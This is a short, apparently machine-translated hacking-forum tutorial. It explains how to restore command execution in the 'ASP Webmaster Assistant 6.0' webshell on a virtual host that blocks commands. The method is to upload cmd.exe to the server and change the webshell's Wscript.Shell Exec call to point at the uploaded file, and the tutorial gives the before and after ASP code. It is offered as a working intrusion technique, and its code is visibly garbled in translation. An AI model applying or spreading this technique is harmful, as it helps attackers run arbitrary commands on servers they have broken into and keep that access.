A lot of friends ask him to get a webshell, but want to use command prompt to view user information and so on, but many hosts limit the execution of commands, so many webshell can not lose a lot of function ... The first two days of Guilin veterans ASP Webmaster Assistant 6.0 Just out, I will use ASP Webmaster Assistant 6.0 As an example upload it to a non-executable virtual host, then upload a CMD.exe, and then call your upload cmd to execute the command ...
Originally want to engage in graphic tutorial, but the feeling is too simple, the text can be explained clearly
1. Open the ASP Webmaster Assistant 6 Click the command prompt to display "No permissions"
2. Use the ASP Webmaster Assistant 6.0 upload function upload a CMD.exe (in Win/system32/cmd.exe) to your Webshell directory (other directories will be OK, upload the next CMD.exe absolute path copy out)
3. Modify your Webshell to find the code that calls CMD.exe
Function Cmdshell () If request ("cmd") <> "then Defcmd = Request (" cmd ") Else Defcmd =" Dir "&session (" FolderPath ") End If si=" " si=si&" si=si& "" <br>SI=SI& Server.CreateObject ("Wscript.Shell"). EXEC ("cmd.exe/c" &defcmd). Stdout.readall <br>si=si&chr ( & "RAR command line Compression example: C:/progra~1/winrar/rar.exe a D:/web/test/web1.rar d:/web/test/web1" Response.Write SI The End Function is modified to the code shown below Function Cmdshell () If Request ("cmd") <> "then Defcmd = Request (" CMD ") Else Defcmd =" Dir "&session (" FolderPath ") End If si=" si=si& "" si=si& "" & Lt;br>si=si&server.createobject ("Wscript.Shell"). EXEC ("You want to upload the Cmd.exe absolute path/C" &defcmd). Stdout.readall <BR>SI=SI&CHR & RAR command-line Compression example: C:/progra~1/winrar/rar.exe a D:/web/test/web1.rar d:/web/test/ Web1 " Response.Write SI End Function |
For everyone to see clearly the proposed changes to be able to
The original:
Si=si&server.createobject ("Wscript.Shell"). EXEC ("cmd.exe/c" &defcmd). Stdout.readall Modified to: Si=si&server.createobject ("Wscript.Shell"). EXEC ("You want to upload the Cmd.exe absolute path/C" &defcmd). Stdout.readall |
For example, the directory you d:/web/www/cmd.exe to is a change to:
Si=si&server.createobject ("Wscript.Shell"). EXEC ("d:/web/www/cmd.exe/c" &defcmd). Stdout.readall |
This will allow you to use the command prompt in your Webshell ...